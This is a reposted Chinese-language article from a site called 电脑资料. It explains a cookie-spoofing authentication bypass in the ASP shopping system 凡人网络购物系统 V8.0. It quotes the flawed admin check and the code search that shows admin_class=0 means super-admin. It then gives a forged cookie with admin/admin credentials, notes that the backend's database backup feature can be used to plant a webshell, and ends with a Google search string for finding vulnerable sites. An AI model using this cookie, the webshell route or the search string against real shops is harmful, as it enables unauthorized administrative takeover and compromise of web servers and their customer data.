凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    ad_chk.asp判断管理员登陆状态

    <%

    if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then

    Response.Cookies("venshop")("admin_name")=""

    Response.Cookies("venshop")("admin_pass")=""

    Response.Cookies("venshop")("admin_class")=""

    response.redirect "ad_login.asp"

    response.end

    end if

    %>

    判断admin_class

    C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp

    ad_admin.asp:29: rs("admin_class")=request("class1")

    ad_admin.asp:43:rs("admin_class")=request("class")

    ad_admin.asp:92:

    elected"%>>总管理员

    ad_admin.asp:93:

    elected"%>>产品管理

    ad_admin.asp:94:

    elected"%>>订单管理

    ........................

    可以看出当admin_class=0的时候就是总管理员身份了,

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

电脑资料

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用》(https://www.unjs.com)。

    伪造cookie如下

    Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin

    然后访问即可,后台有数据库备份可以拿webshell。

    google :inurl:"views.asp?hw_id="

最新文章